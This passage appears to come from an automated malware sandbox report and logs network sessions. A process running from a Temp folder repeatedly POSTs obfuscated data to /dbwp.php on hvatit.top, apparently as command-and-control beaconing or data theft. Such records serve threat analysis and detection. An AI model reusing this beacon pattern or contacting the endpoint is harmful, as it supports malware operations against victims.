                                                        11192.168.2.44974780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:21.497766018 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:21.849148989 CEST2560OUTData Raw: 5f 5a 59 51 5a 5e 55 52 5d 5f 54 57 54 5f 5b 51 5a 51 59 5f 52 55 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _ZYQZ^UR]_TWT_[QZQY_RUT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$(*<5;: (#')(Q$C'_3"+]0+<V/!]'/Z,
                                                        Aug 31, 2024 09:32:22.181421041 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:22.315757036 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.44974880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:22.445745945 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:22.802301884 CEST2560OUTData Raw: 5f 5d 59 53 5a 55 50 57 5d 5f 54 57 54 50 5b 52 5a 53 59 59 52 53 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]YSZUPW]_TWTP[RZSYYRSTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$&?_4R"79,/[ <T':P$?Z3-R<X(,$8?!]'/Z,
                                                        Aug 31, 2024 09:32:23.110151052 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:23.239974022 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.44974980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:23.367980957 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:23.724165916 CEST2560OUTData Raw: 5a 58 59 5f 5f 59 50 52 5d 5f 54 57 54 59 5b 52 5a 52 59 5c 52 5d 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZXY__YPR]_TWTY[RZRY\R]TZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\0.?4S5?-<4#$3:8'5'X0=&++4;/!]'/Z,!
                                                        Aug 31, 2024 09:32:24.041440010 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:24.222552061 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.44975080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:24.355138063 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:24.708517075 CEST2560OUTData Raw: 5a 54 5c 54 5f 5a 50 57 5d 5f 54 57 54 5c 5b 56 5a 54 59 5f 52 51 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZT\T_ZPW]_TWT\[VZTY_RQTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z36A+_$T"-;-,+"(?3 $40*+#(<#U8!]'/Z,5
                                                        Aug 31, 2024 09:32:25.028357983 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:25.156081915 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.44975180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:25.289416075 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:25.646012068 CEST2560OUTData Raw: 5a 5e 5c 56 5f 58 50 5c 5d 5f 54 57 54 59 5b 51 5a 53 59 53 52 54 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^\V_XP\]_TWTY[QZSYSRTTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.'22(8U";9?7^#+(&*0&7&.%?+<</S,!]'/Z,!
                                                        Aug 31, 2024 09:32:25.954807997 CEST25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.44975280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:25.292602062 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:25.646012068 CEST1436OUTData Raw: 5a 5c 5c 51 5f 5d 55 52 5d 5f 54 57 54 59 5b 57 5a 57 59 59 52 5c 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\Q_]UR]_TWTY[WZWYYR\TSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$W&A<),T5=$^,/;^#4U0:(W0C#$>"W?(?]+?#V/?!]'/Z,!
                                                        Aug 31, 2024 09:32:25.981359959 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:26.116364002 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 1d 24 5e 2a 56 37 3b 2a 1f 28 2c 2e 0e 27 30 0d 1d 2f 1f 03 01 29 29 19 5a 2b 2a 30 1d 25 2d 30 12 27 2b 2e 50 24 2f 02 53 33 34 21 5b 07 10 21 03 31 07 30 04 3b 02 00 10 26 30 21 10 21 21 22 5e 29 3e 3e 04 21 5d 26 06 30 01 2e 1a 3b 00 2a 57 2a 3e 37 13 3d 01 20 13 26 28 2b 50 00 12 25 0f 25 01 2b 0b 36 10 22 5e 21 38 33 53 26 35 06 03 20 3b 37 02 3f 06 08 0e 27 12 21 0c 23 09 25 1c 31 0b 3d 02 28 58 2c 08 2b 2c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #$^*V7;*(,.'0/))Z+*0%-0'+.P$/S34![!10;&0!!!"^)>>!]&0.;*W*>7= &(+P%%+6"^!83S&5 ;7?'!#%1=(X,+,&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.44975380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:26.242513895 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:26.599169970 CEST2552OUTData Raw: 5a 5c 5c 52 5a 5d 50 54 5d 5f 54 57 54 58 5b 52 5a 5c 59 5a 52 55 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\RZ]PT]_TWTX[RZ\YZRUT[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[$!D=9!?.47+'\#08'-T(0?/ 8!]'/Z,=
                                                        Aug 31, 2024 09:32:26.919713974 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:27.121907949 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.44975480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:27.241972923 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:27.599133968 CEST2560OUTData Raw: 5a 54 59 52 5a 5f 50 55 5d 5f 54 57 54 59 5b 52 5a 50 59 59 52 52 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYRZ_PU]_TWTY[RZPYYRRTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0)<5=(.Y ?3#34'.V?80<//!]'/Z,!
                                                        Aug 31, 2024 09:32:27.907552004 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:28.039904118 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.44975580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:28.177366018 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:28.536676884 CEST2560OUTData Raw: 5a 55 59 5f 5f 5f 50 51 5d 5f 54 57 54 5b 5b 54 5a 56 59 53 52 5d 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZUY___PQ]_TWT[[TZVYSR]TYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3!"B=*?6>?:'_44U09;&%#Y0>?+?/4.?!]'/Z,)
                                                        Aug 31, 2024 09:32:28.859024048 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:28.991667986 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.44975680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:29.116153002 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:29.474160910 CEST2560OUTData Raw: 5a 5c 59 5f 5f 59 55 50 5d 5f 54 57 54 50 5b 51 5a 51 59 5a 52 55 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\Y__YUP]_TWTP[QZQYZRUT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\'W)?_8!>:844T3*35Y3-*;=,.?!]'/Z,
                                                        Aug 31, 2024 09:32:29.798165083 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:29.931833029 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.44975780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:30.063206911 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:30.411686897 CEST2560OUTData Raw: 5a 5b 59 55 5f 5a 55 51 5d 5f 54 57 54 5a 5b 5d 5a 57 59 5f 52 5d 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z[YU_ZUQ]_TWTZ[]ZWY_R]T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3":+_4S!>-$7( &:7&&7X3>%<]3?,//!]'/Z,-
                                                        Aug 31, 2024 09:32:30.754542112 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:30.890379906 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.44975880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:31.127619028 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:31.474204063 CEST2552OUTData Raw: 5a 59 59 55 5a 5f 55 50 5d 5f 54 57 54 58 5b 53 5a 5c 59 5c 52 51 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYUZ_UP]_TWTX[SZ\Y\RQTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y&!9=) 6'-,; + W0$Z'&S++/??7W,?!]'/Z,
                                                        Aug 31, 2024 09:32:31.816381931 CEST25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.44975980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:31.136121035 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:31.489849091 CEST1436OUTData Raw: 5a 55 59 5f 5a 58 50 57 5d 5f 54 57 54 5f 5b 51 5a 50 59 52 52 51 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZUY_ZXPW]_TWT_[QZPYRRQT^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&2*C+:#5>'./44 ':+'%^$R?;_=/;,/!]'/Z,
                                                        Aug 31, 2024 09:32:31.816292048 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:31.936556101 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 54 24 38 2a 50 34 38 2a 52 2a 5a 26 0d 27 20 23 59 38 08 22 5e 2a 17 1a 06 2a 04 02 57 27 5b 30 5e 30 3b 36 1c 26 3f 02 1d 30 34 21 5b 07 10 22 10 31 07 38 01 3b 02 00 58 26 56 3d 5a 20 1f 0c 19 2a 5b 2d 5b 20 2b 26 07 26 38 32 1a 2c 2a 22 50 28 00 3c 00 3e 01 27 00 25 28 2b 50 00 12 26 52 26 01 27 0b 21 58 35 00 21 06 38 0e 30 1b 3b 12 23 28 30 5c 2b 38 08 0f 33 12 3a 1f 20 23 3d 5a 27 31 31 02 3c 2e 30 08 29 2c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #T$8*P48*R*Z&' #Y8"^**W'[0^0;6&?04!["18;X&V=Z *[-[ +&&82,*"P(<>'%(+P&R&'!X5!80;#(0\+83: #=Z'11<.0),&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.44976080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:32.069358110 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:32.429802895 CEST2560OUTData Raw: 5f 58 5c 54 5f 5d 50 51 5d 5f 54 57 54 5e 5b 51 5a 54 59 5d 52 5d 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\T_]PQ]_TWT^[QZTY]R]TSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&1?V5$_-04;&*4'/X31?++_<< ,!]'/Z,=
                                                        Aug 31, 2024 09:32:32.753007889 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:32.939672947 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.44976180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:33.069237947 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
